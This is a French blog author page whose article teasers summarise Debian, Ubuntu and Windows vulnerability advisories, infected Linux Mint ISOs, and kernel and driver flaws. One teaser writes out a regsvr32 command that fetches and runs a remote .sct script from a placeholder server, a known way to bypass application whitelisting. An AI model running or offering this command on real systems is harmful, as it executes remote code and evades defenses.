Debian De multiples vulnérabilités ont été corrigées dans le noyau linux de debian Les systemes affectés Debian Wheezy versions antérieures à 3.2.73-2+deb7u3 Debian Jessie versions antérieures à 3.16.7-ckt20-1+deb8u4 Les conséquences de cette faille sont déni de service à distance atteinte à l'intégrité des données atteinte à la c
Kevin Petitpre
Kevin Petitpre
Ses blogs
Articles :
15
Depuis :
26/04/2016
Categorie :
Emploi, Enseignement & Etudes
Articles à découvrir
Ubuntu De multiples vulnérabilités ont été corrigées dans le noyau Linux d'Ubuntu. Les systems affectés sont : Ubuntu 12.04 LTS Ubuntu 14.04 LTS Ubuntu 15.04 Ubuntu 15.10 Ubuntu 15.10 pour Raspberry Pi 2 OpenJDK 6 pour Ubuntu 12.04 LTS OpenJDK 7 pour Ubuntu 14.04 LTS, Ubuntu 15.04 et Ubuntu 15.10 Les conséquences sont : exécution de code ar
Regsvr32 est un utilitaire en ligne de commande qui permet d'inscrire ou de désinscrire dans le registre Windows des DLL ou des contrôles activeX il gére aussi les proxys,les redirections et l' HTTPS regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll La commande permet à Regsvr32 d'accepter une URL pointant vers un script sans besoin d'avoi
Ubuntu De multiples vulnérabilités ont été corrigées dans le noyau Linux d'Ubuntu Les systèmes affectés sont : Ubuntu 12.04 LTS Ubuntu 14.04 LTS Ubuntu 15.10 Ubuntu 15.10 (Raspberry Pi 2 Les conséquences sont : déni de service atteinte à la confidentialité des données élévation de privilèges Source : http://www.cert.ssi.gouv.fr/site/
La faille est apparue avec la version 15.7 des pilotes puis a disparu avec la 15.9. La faille, estampillée CVE-2015-7724, faille résidant au sein de fglrx et permettait une escalade des privilèges via une attaque contre la mémoire partagée Posix, à cause de permissions non sécurisées. Source : http://www.nextinpact.com/news/98224-debian-8-3
La nouvelle version d’Ubuntu 16.04 LTS a introduit récemment un nouveau format de gestion de paquets, baptisé Snap que Canonical présentait comme plus sécurisé et plus simple à utiliser que le système précédent un risque sur les versions d’Ubuntu utilisant le système d’affichage X11, ce qui est le cas de la version desktop d’Ubunt
Les isos de linux mint ont été inféctés mais le responsable du projet a remis en place les liens vers les isos officiels Les signatures MD5 des ISO Mint officiels sont les suivantes : 6e7f7e03500747c6c3bfece2c9c8394f linuxmint-17.3-cinnamon-32bit.iso e71a2aad8b58605e906dbea444dc4983 linuxmint-17.3-cinnamon-64bit.iso 30fef1aa1134c5f3778c77c4417f
Windows : De multiples vulnérabilités ont été corrigées dans Microsoft Windows. Les systèmes affectés sont Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 Windows 8.1 Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1 Windows 10 Les conséquences de cette faille sont : exécution de code arbitraire à distance déni
Debian De multiples vulnérabilités ont été corrigées dans le noyau linux de debian Les systèmes affectés : Debian Wheezy versions antérieures à 3.2.73-2+deb7u2 Debian Jessie versions antérieures à 3.16.7-ckt20-1+deb8u2 Debian Sid versions antérieures à 4.3.3-3 Les conséquences de cette faille sont déni de service à distance déni de
Présente au niveau du service keyrings facility, la faille semblait présenter un risque tout relatif avec des distributions Linux car assimilable à une vulnérabilité de type élévation de privilège en local. L'alerte était par contre plus problématique pour Android.